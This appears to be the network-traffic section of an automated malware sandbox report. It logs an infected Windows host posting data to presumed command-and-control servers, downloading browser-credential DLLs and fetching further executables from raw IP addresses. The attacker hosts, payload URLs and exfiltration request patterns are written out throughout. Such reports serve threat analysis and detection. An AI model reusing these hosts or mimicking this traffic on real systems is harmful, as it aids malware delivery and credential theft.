                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5445Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568201Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5897Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 112837Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbtdsjawscshri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gitrvlonrfqrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltjhtqaytuwkyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjjvubikquby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctkjptrcxdnjtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eisoaquivduh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbiuottwvhtdjd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eevetcrfdfleqxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unanbdkiibq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfcngeudnubrryg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                  Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgaaagvpavk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvaotfskdoxlio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipxqunnvdoai.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrjlnlbrgajqsny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopupolbajboxnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imsuruvsrfypw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvpyitsqtsmmqygu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yowyackmlvbjrxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbknieekjatcp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txclniyqjcys.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmtbjhmhexqkn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsnmddlhyunj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eamimphmsadwkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anyyjopgfajdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlfkitushftrjirb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plbuqwbmoldqvnm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjxcjquxocrwkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmlhlokjcexweyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjusdpgryce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajfprnyfteagngdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqimnaeauxblwda.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: dbfhns.in
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FCC60 PR_Recv,13_2_6C9FCC60
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                  Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                  Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                  Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                  Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
